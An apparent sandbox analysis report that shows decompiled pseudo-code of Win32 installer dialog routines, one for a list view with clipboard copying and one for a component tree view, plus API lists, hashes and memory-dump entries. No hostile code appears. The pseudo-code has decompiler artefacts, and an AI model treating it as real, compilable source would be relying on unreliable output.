                                                                                                                    			E00404FC2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423724;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F56, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405BBA(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x420538;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42370c == _t149) {
							ShowWindow( *0x423f48, 8);
							if( *0x423fcc == _t149) {
								E00404E84( *((intOrPtr*)( *0x41fd08 + 0x34)), _t149);
							}
							E00403E2D(1);
							goto L25;
						}
						 *0x41f900 = 2;
						E00403E2D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403EBB(_a8, _a12, _a16);
						}
						ShowWindow( *0x423710, _t149);
						ShowWindow(_t154, 8);
						E00403E89(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423f50;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423710 = GetDlgItem(_a4, 0x403);
				 *0x423708 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423724 = _t127;
				_v8 = _t127;
				E00403E89( *0x423710);
				 *0x423714 = E00404726(4);
				 *0x42372c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E54(_a4);
				if(( *0x423f58 & 0x00000003) != 0) {
					ShowWindow( *0x423710, _t149);
					if(( *0x423f58 & 0x00000002) != 0) {
						 *0x423710 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E89( *0x423708);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423f58 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}
































                                                                                                                    0x00404fcb
                                                                                                                    0x00404fd1
                                                                                                                    0x00404fda
                                                                                                                    0x00404fdd
                                                                                                                    0x00405175
                                                                                                                    0x00405199
                                                                                                                    0x00405199
                                                                                                                    0x004051ac
                                                                                                                    0x004051ca
                                                                                                                    0x004051d1
                                                                                                                    0x00405228
                                                                                                                    0x0040522c
                                                                                                                    0x00000000
                                                                                                                    0x00405233
                                                                                                                    0x0040523b
                                                                                                                    0x00405243
                                                                                                                    0x00405246
                                                                                                                    0x0040533f
                                                                                                                    0x00000000
                                                                                                                    0x0040533f
                                                                                                                    0x00405255
                                                                                                                    0x00405261
                                                                                                                    0x00405267
                                                                                                                    0x0040526d
                                                                                                                    0x00405282
                                                                                                                    0x00405288
                                                                                                                    0x0040526f
                                                                                                                    0x00405274
                                                                                                                    0x0040527a
                                                                                                                    0x0040527d
                                                                                                                    0x0040527d
                                                                                                                    0x00405298
                                                                                                                    0x004052a0
                                                                                                                    0x004052a3
                                                                                                                    0x004052ac
                                                                                                                    0x004052af
                                                                                                                    0x004052b6
                                                                                                                    0x004052bd
                                                                                                                    0x004052c5
                                                                                                                    0x004052c5
                                                                                                                    0x004052dc
                                                                                                                    0x004052dc
                                                                                                                    0x004052e3
                                                                                                                    0x004052e9
                                                                                                                    0x004052f2
                                                                                                                    0x004052f9
                                                                                                                    0x00405302
                                                                                                                    0x00405304
                                                                                                                    0x00405307
                                                                                                                    0x00405316
                                                                                                                    0x00405318
                                                                                                                    0x0040531e
                                                                                                                    0x0040531f
                                                                                                                    0x00405320
                                                                                                                    0x00405328
                                                                                                                    0x00405333
                                                                                                                    0x00405339
                                                                                                                    0x00405339
                                                                                                                    0x00000000
                                                                                                                    0x004052a3
                                                                                                                    0x0040522c
                                                                                                                    0x004051d9
                                                                                                                    0x00405209
                                                                                                                    0x00405211
                                                                                                                    0x0040521c
                                                                                                                    0x0040521c
                                                                                                                    0x00405223
                                                                                                                    0x00000000
                                                                                                                    0x00405223
                                                                                                                    0x004051dd
                                                                                                                    0x004051e7
                                                                                                                    0x00000000
                                                                                                                    0x004051ae
                                                                                                                    0x004051b4
                                                                                                                    0x004051ec
                                                                                                                    0x00000000
                                                                                                                    0x004051f5
                                                                                                                    0x004051bd
                                                                                                                    0x004051c2
                                                                                                                    0x004051c5
                                                                                                                    0x00000000
                                                                                                                    0x004051c5
                                                                                                                    0x004051ac
                                                                                                                    0x00404fe3
                                                                                                                    0x00404fe7
                                                                                                                    0x00404ff0
                                                                                                                    0x00404ff7
                                                                                                                    0x00404ffa
                                                                                                                    0x00404ffd
                                                                                                                    0x00405000
                                                                                                                    0x00405001
                                                                                                                    0x00405002
                                                                                                                    0x0040501b
                                                                                                                    0x0040501e
                                                                                                                    0x00405028
                                                                                                                    0x00405037
                                                                                                                    0x0040503f
                                                                                                                    0x00405047
                                                                                                                    0x0040504c
                                                                                                                    0x0040504f
                                                                                                                    0x0040505b
                                                                                                                    0x00405064
                                                                                                                    0x0040506d
                                                                                                                    0x00405090
                                                                                                                    0x00405096
                                                                                                                    0x004050a7
                                                                                                                    0x004050ac
                                                                                                                    0x004050ba
                                                                                                                    0x004050c8
                                                                                                                    0x004050c8
                                                                                                                    0x004050cd
                                                                                                                    0x004050db
                                                                                                                    0x004050db
                                                                                                                    0x004050e0
                                                                                                                    0x004050e3
                                                                                                                    0x004050e8
                                                                                                                    0x004050f4
                                                                                                                    0x004050fd
                                                                                                                    0x0040510a
                                                                                                                    0x00405119
                                                                                                                    0x0040510c
                                                                                                                    0x00405111
                                                                                                                    0x00405111
                                                                                                                    0x00405125
                                                                                                                    0x00405125
                                                                                                                    0x00405139
                                                                                                                    0x00405142
                                                                                                                    0x0040514b
                                                                                                                    0x0040515b
                                                                                                                    0x00405167
                                                                                                                    0x00405167
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32 ref: 00405021
                                                                                                                    • GetDlgItem.USER32 ref: 00405030
                                                                                                                    • GetClientRect.USER32 ref: 0040506D
                                                                                                                    • GetSystemMetrics.USER32 ref: 00405075
                                                                                                                    • SendMessageA.USER32 ref: 00405096
                                                                                                                    • SendMessageA.USER32 ref: 004050A7
                                                                                                                    • SendMessageA.USER32 ref: 004050BA
                                                                                                                    • SendMessageA.USER32 ref: 004050C8
                                                                                                                    • SendMessageA.USER32 ref: 004050DB
                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004050FD
                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405111
                                                                                                                    • GetDlgItem.USER32 ref: 00405132
                                                                                                                    • SendMessageA.USER32 ref: 00405142
                                                                                                                    • SendMessageA.USER32 ref: 0040515B
                                                                                                                    • SendMessageA.USER32 ref: 00405167
                                                                                                                    • GetDlgItem.USER32 ref: 0040503F
                                                                                                                      • Part of subcall function 00403E89: SendMessageA.USER32 ref: 00403E97
                                                                                                                    • GetDlgItem.USER32 ref: 00405184
                                                                                                                    • CreateThread.KERNEL32 ref: 00405192
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405199
                                                                                                                    • ShowWindow.USER32(00000000), ref: 004051BD
                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004051C2
                                                                                                                    • ShowWindow.USER32(00000008), ref: 00405209
                                                                                                                    • SendMessageA.USER32 ref: 0040523B
                                                                                                                    • CreatePopupMenu.USER32 ref: 0040524C
                                                                                                                    • AppendMenuA.USER32 ref: 00405261
                                                                                                                    • GetWindowRect.USER32 ref: 00405274
                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405298
                                                                                                                    • SendMessageA.USER32 ref: 004052D3
                                                                                                                    • OpenClipboard.USER32(00000000), ref: 004052E3
                                                                                                                    • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004052E9
                                                                                                                    • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F2
                                                                                                                    • GlobalLock.KERNEL32 ref: 004052FC
                                                                                                                    • SendMessageA.USER32 ref: 00405310
                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405328
                                                                                                                    • SetClipboardData.USER32 ref: 00405333
                                                                                                                    • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 00405339
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                    • String ID: {
                                                                                                                    • API String ID: 590372296-366298937
                                                                                                                    • Opcode ID: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                                                                                                    • Instruction ID: 6929f331228a41c4e1f6bf5049925f100d3ed94cd800429e98060a15954be78d
                                                                                                                    • Opcode Fuzzy Hash: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                                                                                                    • Instruction Fuzzy Hash: 6DA13AB1900208BFDB119F60DD89AAE7F79FB44355F00813AFA05BA1A0C7795E41DFA9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004047D3, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 97%
                                                                                                                    			E004047D3(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423f68;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423f50 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423f59 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404753(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423f58) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x420514;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x42052c;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x420514 = _t315;
								 *0x42052c = _t315;
								 *0x423fa0 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423f59 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x42052c;
									_t196 =  *0x423f68;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423f6c <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42371c + 0x10)) != _t315) {
											E0040470E(0x3ff, 0xfffffffb, E00404726(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423f6c);
									goto L84;
								} else {
									_t282 = E004012E2( *0x42052c);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423fa0 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42052c = GlobalAlloc(0x40,  *0x423f6c << 2);
					_t250 = LoadBitmapA( *0x423f40, 0x6e);
					 *0x420520 =  *0x420520 | 0xffffffff;
					_v24 = _t250;
					 *0x420528 = SetWindowLongA(_v8, 0xfffffffc, E00404DD4);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420514 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420514);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BBA(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E54(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E54(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423f6c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42052c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42052c + _t318 * 4) = _t274;
									_t288 =  *( *0x42052c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423f6c);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E89(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E89(_v12);
								L89:
								return E00403EBB(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                                                    0x004047f1
                                                                                                                    0x004047f7
                                                                                                                    0x004047f9
                                                                                                                    0x004047ff
                                                                                                                    0x00404805
                                                                                                                    0x00404812
                                                                                                                    0x0040481b
                                                                                                                    0x0040481e
                                                                                                                    0x00404821
                                                                                                                    0x00404a49
                                                                                                                    0x00404a50
                                                                                                                    0x00404a64
                                                                                                                    0x00404a52
                                                                                                                    0x00404a54
                                                                                                                    0x00404a57
                                                                                                                    0x00404a58
                                                                                                                    0x00404a5f
                                                                                                                    0x00404a5f
                                                                                                                    0x00404a70
                                                                                                                    0x00404a7e
                                                                                                                    0x00404a81
                                                                                                                    0x00404a97
                                                                                                                    0x00404b0f
                                                                                                                    0x00404b12
                                                                                                                    0x00404b14
                                                                                                                    0x00404b1e
                                                                                                                    0x00404b2c
                                                                                                                    0x00404b2c
                                                                                                                    0x00404b2e
                                                                                                                    0x00404b38
                                                                                                                    0x00404b3e
                                                                                                                    0x00404b5f
                                                                                                                    0x00404b40
                                                                                                                    0x00404b4d
                                                                                                                    0x00404b4d
                                                                                                                    0x00404b3e
                                                                                                                    0x00404b38
                                                                                                                    0x00000000
                                                                                                                    0x00404b12
                                                                                                                    0x00404a9c
                                                                                                                    0x00404aa7
                                                                                                                    0x00404aac
                                                                                                                    0x00404ab3
                                                                                                                    0x00404aba
                                                                                                                    0x00404ac4
                                                                                                                    0x00404ac4
                                                                                                                    0x00404ac8
                                                                                                                    0x00404acd
                                                                                                                    0x00404ad2
                                                                                                                    0x00404ae8
                                                                                                                    0x00404ad4
                                                                                                                    0x00404ad4
                                                                                                                    0x00404adc
                                                                                                                    0x00404ae3
                                                                                                                    0x00404ade
                                                                                                                    0x00404ade
                                                                                                                    0x00404ade
                                                                                                                    0x00404adc
                                                                                                                    0x00404aec
                                                                                                                    0x00404aee
                                                                                                                    0x00404afc
                                                                                                                    0x00404afd
                                                                                                                    0x00404b09
                                                                                                                    0x00404b0c
                                                                                                                    0x00404b0c
                                                                                                                    0x00404acd
                                                                                                                    0x00000000
                                                                                                                    0x00404aba
                                                                                                                    0x00404a9e
                                                                                                                    0x00404aa5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00404b62
                                                                                                                    0x00404b62
                                                                                                                    0x00404b69
                                                                                                                    0x00404bdd
                                                                                                                    0x00404be4
                                                                                                                    0x00404bf0
                                                                                                                    0x00404bf0
                                                                                                                    0x00404bf9
                                                                                                                    0x00404bfb
                                                                                                                    0x00404c02
                                                                                                                    0x00404c05
                                                                                                                    0x00404c05
                                                                                                                    0x00404c0b
                                                                                                                    0x00404c12
                                                                                                                    0x00404c15
                                                                                                                    0x00404c15
                                                                                                                    0x00404c1b
                                                                                                                    0x00404c21
                                                                                                                    0x00404c27
                                                                                                                    0x00404c27
                                                                                                                    0x00404c34
                                                                                                                    0x00404d81
                                                                                                                    0x00404d88
                                                                                                                    0x00404da5
                                                                                                                    0x00404dab
                                                                                                                    0x00404dbd
                                                                                                                    0x00404dbd
                                                                                                                    0x00000000
                                                                                                                    0x00404c3a
                                                                                                                    0x00404c3c
                                                                                                                    0x00404c44
                                                                                                                    0x00404c48
                                                                                                                    0x00404c48
                                                                                                                    0x00404c50
                                                                                                                    0x00404c91
                                                                                                                    0x00404c93
                                                                                                                    0x00404ca3
                                                                                                                    0x00404ca6
                                                                                                                    0x00404cab
                                                                                                                    0x00404cb2
                                                                                                                    0x00404cb5
                                                                                                                    0x00404d57
                                                                                                                    0x00404d5d
                                                                                                                    0x00404d6b
                                                                                                                    0x00404d7c
                                                                                                                    0x00404d7c
                                                                                                                    0x00000000
                                                                                                                    0x00404d6b
                                                                                                                    0x00404cbb
                                                                                                                    0x00404cbe
                                                                                                                    0x00404cc4
                                                                                                                    0x00404cc9
                                                                                                                    0x00404ccb
                                                                                                                    0x00404ccd
                                                                                                                    0x00404cd3
                                                                                                                    0x00404cda
                                                                                                                    0x00404cdf
                                                                                                                    0x00404ce6
                                                                                                                    0x00404ce9
                                                                                                                    0x00404ce9
                                                                                                                    0x00404cf0
                                                                                                                    0x00404cfc
                                                                                                                    0x00404d00
                                                                                                                    0x00404d02
                                                                                                                    0x00404d02
                                                                                                                    0x00404cf2
                                                                                                                    0x00404cf4
                                                                                                                    0x00404cf4
                                                                                                                    0x00404d22
                                                                                                                    0x00404d2e
                                                                                                                    0x00404d3d
                                                                                                                    0x00404d3d
                                                                                                                    0x00404d3f
                                                                                                                    0x00404d42
                                                                                                                    0x00404d4b
                                                                                                                    0x00000000
                                                                                                                    0x00404c52
                                                                                                                    0x00404c5d
                                                                                                                    0x00404c60
                                                                                                                    0x00404c65
                                                                                                                    0x00404c67
                                                                                                                    0x00404c6b
                                                                                                                    0x00404c7b
                                                                                                                    0x00404c85
                                                                                                                    0x00404c87
                                                                                                                    0x00404c8a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00404c6d
                                                                                                                    0x00404c6d
                                                                                                                    0x00404c73
                                                                                                                    0x00404c75
                                                                                                                    0x00404c75
                                                                                                                    0x00404c76
                                                                                                                    0x00404c77
                                                                                                                    0x00000000
                                                                                                                    0x00404c6d
                                                                                                                    0x00404c50
                                                                                                                    0x00404c34
                                                                                                                    0x00404b71
                                                                                                                    0x00000000
                                                                                                                    0x00404b87
                                                                                                                    0x00404b91
                                                                                                                    0x00404b96
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00404ba8
                                                                                                                    0x00404bad
                                                                                                                    0x00404bb9
                                                                                                                    0x00404bb9
                                                                                                                    0x00404bbb
                                                                                                                    0x00404bca
                                                                                                                    0x00404bcc
                                                                                                                    0x00404bd3
                                                                                                                    0x00404bd6
                                                                                                                    0x00000000
                                                                                                                    0x00404bd6
                                                                                                                    0x00404b71
                                                                                                                    0x00404827
                                                                                                                    0x0040482c
                                                                                                                    0x00404836
                                                                                                                    0x00404837
                                                                                                                    0x00404840
                                                                                                                    0x0040484b
                                                                                                                    0x00404856
                                                                                                                    0x0040485c
                                                                                                                    0x0040486a
                                                                                                                    0x0040487f
                                                                                                                    0x00404884
                                                                                                                    0x0040488f
                                                                                                                    0x00404898
                                                                                                                    0x004048ad
                                                                                                                    0x004048be
                                                                                                                    0x004048cb
                                                                                                                    0x004048cb
                                                                                                                    0x004048d0
                                                                                                                    0x004048d6
                                                                                                                    0x004048d8
                                                                                                                    0x004048db
                                                                                                                    0x004048e0
                                                                                                                    0x004048e5
                                                                                                                    0x004048e7
                                                                                                                    0x004048e7
                                                                                                                    0x00404907
                                                                                                                    0x00404907
                                                                                                                    0x00404909
                                                                                                                    0x0040490a
                                                                                                                    0x0040490f
                                                                                                                    0x00404912
                                                                                                                    0x00404915
                                                                                                                    0x00404919
                                                                                                                    0x0040491e
                                                                                                                    0x00404923
                                                                                                                    0x00404927
                                                                                                                    0x0040492c
                                                                                                                    0x00404931
                                                                                                                    0x00404933
                                                                                                                    0x0040493b
                                                                                                                    0x00404a05
                                                                                                                    0x00404a18
                                                                                                                    0x00000000
                                                                                                                    0x00404941
                                                                                                                    0x00404944
                                                                                                                    0x00404947
                                                                                                                    0x0040494a
                                                                                                                    0x0040494a
                                                                                                                    0x00404950
